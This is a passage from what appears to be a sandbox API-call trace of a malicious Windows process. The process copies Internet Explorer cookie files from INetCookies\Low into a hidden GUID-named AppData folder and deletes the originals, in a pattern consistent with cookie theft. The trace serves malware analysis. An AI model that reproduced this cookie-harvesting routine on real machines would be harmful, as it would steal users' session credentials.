lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\DRDF2EZX.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\drdf2ezx.txt"), bFailIfExists=0) returned 1 [0252.383] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\DRDF2EZX.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\drdf2ezx.txt")) returned 1 [0252.384] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0252.384] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0252.384] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0252.384] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0252.384] StrChrW (lpStart="Low\\E2KPI4ZI.txt", wMatch=0x74c005c) returned="\\E2KPI4ZI.txt" [0252.384] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0252.385] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0252.385] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0252.385] StrChrW (lpStart="E2KPI4ZI.txt", wMatch=0x74c005c) returned 0x0 [0252.385] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="E2KPI4ZI.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\E2KPI4ZI.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\E2KPI4ZI.txt" [0252.385] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\E2KPI4ZI.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\e2kpi4zi.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\E2KPI4ZI.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\e2kpi4zi.txt"), bFailIfExists=0) returned 1 [0252.390] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\E2KPI4ZI.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\e2kpi4zi.txt")) returned 1 [0252.392] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0252.392] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0252.392] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0252.392] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0252.392] StrChrW (lpStart="Low\\E978TFRK.txt", wMatch=0x74c005c) returned="\\E978TFRK.txt" [0252.392] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0252.392] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0252.392] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0252.392] StrChrW (lpStart="E978TFRK.txt", wMatch=0x74c005c) returned 0x0 [0252.392] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="E978TFRK.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\E978TFRK.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\E978TFRK.txt" [0252.392] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\E978TFRK.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\e978tfrk.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\E978TFRK.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\e978tfrk.txt"), bFailIfExists=0) returned 1 [0252.398] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\E978TFRK.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\e978tfrk.txt")) returned 1 [0252.439] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0252.439] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0252.439] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0252.439] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0252.439] StrChrW (lpStart="Low\\F68MFAMN.txt", wMatch=0x74c005c) returned="\\F68MFAMN.txt" [0252.439] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0252.439] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0252.439] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0252.439] StrChrW (lpStart="F68MFAMN.txt", wMatch=0x74c005c) returned 0x0 [0252.439] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="F68MFAMN.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\F68MFAMN.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\F68MFAMN.txt" [0252.439] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\F68MFAMN.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\f68mfamn.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\F68MFAMN.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\f68mfamn.txt"), bFailIfExists=0) returned 1 [0252.444] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\F68MFAMN.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\f68mfamn.txt")) returned 1 [0252.445] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0252.445] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0252.445] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0252.445] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0252.445] StrChrW (lpStart="Low\\FCGXHIFT.txt", wMatch=0x74c005c) returned="\\FCGXHIFT.txt" [0252.445] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0252.445] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0252.445] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0252.445] StrChrW (lpStart="FCGXHIFT.txt", wMatch=0x74c005c) returned 0x0 [0252.445] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="FCGXHIFT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\FCGXHIFT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\FCGXHIFT.txt" [0252.445] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\FCGXHIFT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\fcgxhift.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\FCGXHIFT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\fcgxhift.txt"), bFailIfExists=0) returned 1 [0252.450] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\FCGXHIFT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\fcgxhift.txt")) returned 1 [0252.451] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0252.451] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0252.451] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0252.451] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0252.451] StrChrW (lpStart="Low\\FGTTES1V.txt", wMatch=0x74c005c) returned="\\FGTTES1V.txt" [0252.451] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0252.451] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0252.451] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0252.451] StrChrW (lpStart="FGTTES1V.txt", wMatch=0x74c005c) returned 0x0 [0252.451] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="FGTTES1V.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\FGTTES1V.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\FGTTES1V.txt" [0252.452] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\FGTTES1V.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\fgttes1v.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\FGTTES1V.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\fgttes1v.txt"), bFailIfExists=0) returned 1 [0252.458] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\FGTTES1V.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\fgttes1v.txt")) returned 1 [0252.459] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0252.459] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0252.459] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0252.459] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") 